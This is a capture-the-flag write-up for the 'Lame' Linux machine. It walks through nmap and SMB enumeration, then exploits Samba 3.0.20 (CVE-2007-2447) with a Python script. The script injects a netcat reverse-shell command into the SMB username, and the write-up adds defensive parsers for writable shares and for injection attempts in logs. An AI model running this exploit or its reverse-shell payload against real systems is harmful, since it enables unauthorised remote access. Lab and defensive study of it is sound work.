Lame

OS: Linux
Difficulty: Easy
Points: 20

Nmap Scan

ports=$(nmap -p- --min-rate=5000 -T4 10.10.10.3 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.048s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

The machine has several open ports. We enumerate the SMB ports (139, 445) and find that one of the shared directories is writable.

smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445  Name: 10.10.10.3                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
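When triaging many hosts, reading smbmap output by eye does not scale. The following parser is an added example, not part of the original writeup or of smbmap itself: it takes smbmap's text output (the sample below is constructed from the listing above) and returns the shares that allow writing, which is where anonymous uploads become a risk.

```python
import re

# Constructed sample modelled on the smbmap listing above (not live output).
SAMPLE_SMBMAP = """\
[+] IP: 10.10.10.3:445  Name: 10.10.10.3                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
"""

# A share line: indented share name, two or more spaces, the permission
# phrase smbmap prints, then an optional free-text comment.
SHARE_LINE = re.compile(
    r"^\s+(\S+)\s{2,}(NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY)\s*(.*)$"
)


def parse_shares(output):
    """Return (share, permissions, comment) tuples found in smbmap text output."""
    shares = []
    for line in output.splitlines():
        match = SHARE_LINE.match(line)
        if match:
            name, perms, comment = match.groups()
            shares.append((name, perms, comment.strip()))
    return shares


def writable_shares(output):
    """Share names the current (here: null) session may write to."""
    return [name for name, perms, _ in parse_shares(output) if "WRITE" in perms]


def readable_shares(output):
    """Share names the current session may at least read."""
    return [name for name, perms, _ in parse_shares(output) if "READ" in perms]


if __name__ == "__main__":
    for name, perms, comment in parse_shares(SAMPLE_SMBMAP):
        print(f"{name:10} {perms:12} {comment}")
    print("writable:", writable_shares(SAMPLE_SMBMAP))
```

Run it against a saved smbmap report (`smbmap -H host > report.txt`) by passing the file contents to `writable_shares`; a non-empty result on an unauthenticated session is the finding to record, independent of any later exploitation.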

However, the share contains nothing relevant to us.

smbclient //10.10.10.3/tmp
smb: \> ls
  .                                   D        0  Tue Jan  7 01:11:12 2025
  ..                                 DR        0  Sat Oct 31 03:33:58 2020
  5569.jsvc_up                        R        0  Mon Jan  6 16:42:26 2025
  .ICE-unix                          DH        0  Mon Jan  6 16:41:21 2025
  vmware-root                        DR        0  Mon Jan  6 16:41:27 2025
  .X11-unix                          DH        0  Mon Jan  6 16:41:49 2025
  .X0-lock                           HR       11  Mon Jan  6 16:41:49 2025
  vgauthsvclog.txt.0                  R     1600  Mon Jan  6 16:41:20 2025

Samba 3.0.20 - Command Execution (CVE-2007-2447)

After enumerating, we identify that the Samba version the server is running is vulnerable to command execution through the 'username map script' option (CVE-2007-2447). We use the following script to exploit the service.

Note

The pysmb library must be installed first.
pip install pysmb

exploit.py
import sys
from smb.SMBConnection import SMBConnection


if len(sys.argv) != 5:
    print("* CVE-2007-2447 | Samba 3.0.20 < 3.0.25rc 'Username map script' Command Execution *\n")
    print("Usage: python3 exploit.py <rhost> <rport> <lhost> <lport>")
    print("Example: python3 exploit.py 10.10.10.10 139 127.0.0.1 4444")
    sys.exit(1)

rhost = sys.argv[1]
rport = int(sys.argv[2])  # the socket port must be an integer, not the argv string
lhost = sys.argv[3]
lport = sys.argv[4]

# The 'username map script' option hands the username to a shell unescaped,
# so the backticks in the username are executed on the server (CVE-2007-2447).
username = f"/=`nohup nc -e /bin/bash {lhost} {lport}`"
conn = SMBConnection(username=username, password='', my_name='', remote_name='')

try:
    print("[...] Sending payload")
    # The command runs while the server processes the session setup; the
    # authentication itself fails, which lands in the except branch below.
    conn.connect(rhost, rport, timeout=10)
except Exception as e:
    print("[ + ] You should be getting a shell now.")
    sys.exit(e)

Start the netcat listener.

nc -lvnp 1234

Run the script.

python3 exploit.py 10.10.10.3 139 10.10.14.2 1234

Once it runs we receive the reverse shell, and no privilege escalation is needed.
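From the defender's side, the same bug has two cheap checks: whether smb.conf enables 'username map script' at all, and whether any SMB username seen in authentication logs carries shell metacharacters, which a legitimate account name never needs. The code below is an added example, not part of the original writeup or of Samba; the smb.conf and log excerpts are constructed, and the `user [name]` bracket format in the log lines is an assumption about the log layout, not Samba's documented output.

```python
import re

# Shell metacharacters that let a username reach the shell behind
# 'username map script' (CVE-2007-2447): backticks, $(...), pipes, separators.
SHELL_META = re.compile(r"[`$|;&<>]")

# Constructed smb.conf excerpt (not taken from the target).
SAMPLE_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   username map script = /etc/samba/scripts/mapusers.sh

[tmp]
   path = /tmp
   writable = yes
"""

# Constructed log excerpt; the "user [name]" layout is an assumption.
SAMPLE_LOG = """\
[2025/01/06 16:42:01, 2] smbd/sesssetup.c: authentication for user [makis] succeeded
[2025/01/06 16:42:26, 2] smbd/sesssetup.c: authentication for user [/=`id`] failed
[2025/01/06 16:43:10, 2] smbd/sesssetup.c: authentication for user [guest] failed
"""

USER_FIELD = re.compile(r"user \[([^\]]*)\]")


def suspicious_username(name):
    """True if the SMB username contains characters that only make sense as shell syntax."""
    return bool(SHELL_META.search(name))


def username_map_script_enabled(smb_conf):
    """Return the configured 'username map script' value, or None if unset or commented out.

    Samba ignores case and whitespace inside parameter names, so the
    comparison normalises the key the same way.
    """
    for line in smb_conf.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith(("#", ";")):
            continue
        key, sep, value = stripped.partition("=")
        if sep and key.strip().lower().replace(" ", "") == "usernamemapscript":
            return value.strip() or None
    return None


def flag_log(log_text):
    """Usernames from the log that look like command-injection attempts."""
    hits = []
    for line in log_text.splitlines():
        match = USER_FIELD.search(line)
        if match and suspicious_username(match.group(1)):
            hits.append(match.group(1))
    return hits


if __name__ == "__main__":
    script = username_map_script_enabled(SAMPLE_CONF)
    print("username map script:", script or "not set")
    print("suspicious logins:", flag_log(SAMPLE_LOG))
```

A configuration check that returns a script path on a Samba release older than 3.0.25 is the finding to fix (remove the option or upgrade); the log check is worth running over historical logs as well, since the injected username is recorded even when the authentication fails.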

References

https://github.com/banomaly/CVE-2007-2447